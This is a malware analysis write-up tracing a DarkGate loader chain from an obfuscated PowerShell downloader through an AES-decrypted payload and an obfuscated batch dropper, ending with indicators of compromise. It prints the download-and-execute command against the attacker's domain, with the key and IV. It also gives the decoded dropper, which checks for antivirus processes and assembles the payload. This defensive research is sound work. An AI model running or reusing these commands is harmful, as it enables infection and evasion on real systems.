Darkgate Campaign
Introduction
DarkGate is a modular loader and botnet toolkit first observed in 2017 that enables operators to fully compromise victim hosts, persist, drop secondary payloads, and provide remote access and data exfiltration capabilities
Executive Summary
An obfuscated PowerShell downloader that constructs and executes a remote command to fetch NoBu.obb. Static inspection of NoBu.obb revealed randomized variable names, a large Base64 blob and decryption that using AES-CBC (with padding). The decrypted output is dropped to the host TEMP directory and executed.
A classic staging technique used to evade detection and deliver a secondary payload. Post-execution behavior matches DarkGate loader/botnet activity. The host is prepared for persistence, secondary modules are unpacked and launched, and the implant attempts to establish outbound connections to attacker controlled infrastructure.
Initial Observation
An obfuscated PowerShell invocation was discovered on the host. The command using quoted fragments to construct and invoke a remote command via iex and Invoke-RestMethod to avoid EDR detection:
1
POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://z"3"n.f"un/N"o"Bu.ob"b)"
After deobfuscation the command should be something like this below:
1
PowerShell -WindowStyle Hidden -Command "iex (irm 'https://z3n.fun/NoBu.obb')"
the powershell attempts to download and execute content from hxxps[://]z3n[.]fun/NoBu.obb
Analysis of NoBu.obb reveals an obfuscated script (randomized variable names) that decodes a Base64 blob, decrypts it using AES-CBC with padding, and drops the resulting file to the system TEMP directory.
Decoding Process
Python script below is a development process to replicate the original script’s behavior by extracting and decrypting its embedded content:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import base64
from Crypto.Cipher import AES
key_b64 = "5xTK9HCPrbLHtHKnhoUTy1aKGQ/x8DX53c9K64dEI1E="
iv_b64 = "Yd8Pupt4L/vjrfixEsO0RQ=="
content_b64 = "S0EN+7DbqvoT8c4...<STRIP>...9GQ=="
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
ciphertext = base64.b64decode(content_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)
# Remove PKCS7 padding
pad_len = decrypted[-1]
plaintext = decrypted[:-pad_len]
with open("unknown", "wb") as f:
f.write(plaintext)
extracting and checking the hash:
1
2
3
4
5
6
7
8
9
10
11
λ python decrypt.py
λ file unknown
sus.txt: Zip archive data, at least v2.0 to extract
λ unzip unknown
Archive: unknown
inflating: SheetsToo.exe
λ md5sum SheetsToo.exe
f3edd221d30ee029f97b10e06b9162ba *SheetsToo.exe
checking the hash on virus total. 33/70 flagged as malicious and family label was under darkgate:
Reverse Engineering
Static Analysis
checking the file type:
1
2
λ file SheetsToo.exe
SheetsToo.exe: PE32 executable (GUI) Intel 80386, for MS Windows
checking the program (using detect it easy). it detect as 32bit program.
some command inside while checking the string in the program:
.png?table=block&id=28e26e60-5e7e-80f7-a94b-cb321ee5e159&spaceId=2b1ea456-18af-403c-953f-e1f8e610fc0e&width=1220&userId=&cache=v2&imgBuildSrc=requestProxiedImageUrl)
Dynamic Analysis
process running and checked using process monitor(procmon):
.png?table=block&id=28e26e60-5e7e-8004-bc79-c6dc195406b3&spaceId=2b1ea456-18af-403c-953f-e1f8e610fc0e&width=1220&userId=&cache=v2&imgBuildSrc=requestProxiedImageUrl)
dropped file and one folder of 392951:
.png?table=block&id=28e26e60-5e7e-8031-8e07-ceb57a615be3&spaceId=2b1ea456-18af-403c-953f-e1f8e610fc0e&width=1220&userId=&cache=v2&imgBuildSrc=requestProxiedImageUrl)
entering Nebraska.wbk.bat. it set certain character into word. thats the obfuscate methodology of it:
Deobfuscation
Extracting only important word and removing the unknown character and word would be like this below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Set Referral=c
Set Combinations=U
Set B=G
Set Internet=m
Set Tu=I
Set Appear=W
Set Milf=Q
Set Nut=S
Set Vegetables=l
Set Collection=4
Set Bacterial=k
Set Fresh=B
Set Failed=a
Set Crew=C
Set Nearly=.
Set Professor=3
%Nut%et s%Appear%r%B%%Nut%%Nut%V=Rep%Vegetables%i%Referral%%Failed%%Nearly%s%Referral%r
%Nut%et %Crew%JXw%Referral%JXtuAVds%Failed%%Referral%sY%Crew%L%Appear%bVqjX%Milf%Ysg%Referral%%B%J%Bacterial%%Internet%Xd%Failed%=
%Nut%et q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg=5
t%Failed%s%Bacterial%%Vegetables%ist | findstr "bdservi%Referral%ehost e%Bacterial%rn Av%Failed%st%Combinations%%Tu% %Nut%ophosHe%Failed%%Vegetables%th AV%B%%Combinations%%Tu% ns%Appear%s%Referral%%Nut%v%Referral%" & if not error%Vegetables%eve%Vegetables% 1 %Nut%et s%Appear%r%B%%Nut%%Nut%V=Auto%Tu%t%Professor%%Nearly%exe & %Nut%et %Crew%JXw%Referral%JXtuAVds%Failed%%Referral%sY%Crew%L%Appear%bVqjX%Milf%Ysg%Referral%%B%J%Bacterial%%Internet%Xd%Failed%=%Nearly%%Failed%u%Professor% & %Nut%et q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg=287
%Nut%et /%Failed% Free=%Professor%92951
%Internet%d %Free%
st%Failed%rt /w%Failed%it extr%Failed%%Referral%%Professor%2 /Y V%Nearly%wb%Bacterial% *%Nearly%*
set /p ="MZ" > %Free%\%sWrGSSV% <nu%Vegetables%
findstr /V "Kit%Referral%hen" %Appear%hy >> %Free%\%sWrGSSV%
%Referral%opy /b /y %Free%\%sWrGSSV% + Definitions + D%Failed%ughters + He%Failed%vi%Vegetables%y + %Nut%oftb%Failed%%Vegetables%%Vegetables% + Jord%Failed%n + Lo%Vegetables%it%Failed% + Forest + Ap%Failed%rt%Internet%ent + %Nut%urprising + %Tu%nternship + Additions %Free%\%sWrGSSV%
%Referral%d %Free%
%Referral%opy /b /y %Nearly%%Nearly%\%Appear%et%Nearly%wb%Bacterial% + %Nearly%%Nearly%\%Nut%%Referral%reening%Nearly%wb%Bacterial% + %Nearly%%Nearly%\Down%Vegetables%o%Failed%ding%Nearly%wb%Bacterial% R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
%sWrGSSV% R%CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda%
%Referral%d %Nearly%%Nearly%
w%Failed%itfor /T %qIAfmXMxONmvmqdsXqrbTqvCnBGbYitg% q%Tu%Af%Internet%XMxON%Internet%v%Internet%qdsXqrbTqv%Crew%n%Fresh%%B%bYitg
fully decode of the deobfuscate:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Set sWraGGSV=Replica.scr
Set CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda=
Set qIAmXmXMxONmvmqdsXqrbTqvCnBGbYitg=5
tasklist | findstr "bdservicehost ekrn AvastUI SophosHealth AVGUI nsWscSvc" & if not errorlevel 1 (
Set sWraGGSV=AutoIt3.exe
Set CJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda=.au3
Set qIAmXmXMxONmvmqdsXqrbTqvCnBGbYitg=287
)
Set /a %Free%=392951
md 392951
start /wait extrac3 /Y V.k *.*
set /p ="MZ" > 392951\Replica.scr <nul
findstr /V "Kitchen" Why >> 392951\Replica.scr
copy /b /y 392951\Replica.scr + Definitions + Daughters + Heavy + Softball + Jordan + Lolita + Forest + Apartment + Surprising + Internship + Additions 392951\Replica.scr
cd 392951
copy /b /y ..\Wet.wbk + ..\Screening.wbk + ..\Downloading.wbk RCJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda
Replica.scr RCJXwcJXtuAVdsacsYCLWbVqjXQYsgcGJkmXda
cd ..
waitfor /T 287 qIAmXmXMxONmvmqdsXqrbTqvCnBGbYitg
Behavior Analysis
re-simulate:
1
2
3
4
5
λ copy /b /y ..\Wet.wbk + ..\Screening.wbk + ..\Downloading.wbk R.au3
..\Wet.wbk
..\Screening.wbk
..\Downloading.wbk
1 file(s) copied.
when trying to run it try to execute the C2 connection:
1
λ ./Replica.scr R.au3
the C2 trying to connect it:
when check back at the virustotal the dns was the same:
Indicator of Compromised
| IOC | Type | File Name |
|---|---|---|
| FmYHjjXUeGKckCRHHxEDWmWbkdx[.]FmYHjjXUeGKckCRHHxEDWmWbkdx | URL/Domain | - |
| hxxps[://]z3n[.]fun/NoBu.obb | URL | - |
| f3edd221d30ee029f97b10e06b9162ba | Hash (MD5) | SheetsToo.exe |
| 5cbed68c61747e7db892f00e507a4dd6 | Hash (MD5) | r.au3 |
| f589c1095824c52a5ed3625d0d851b22 | Hash (MD5) | Replica.scr |
| 188f4fb7f5d742b82224da0e7c54bcab | Hash (MD5) | Nebraska.wbk.bat |
| 796104eddb3e7137abbbd5c3cb55fb6c | Hash (MD5) | NoBu.obb |
| d019fcb03782d699af6b1d98f6193e38 | Hash (MD5) | temp<random_number>.zip |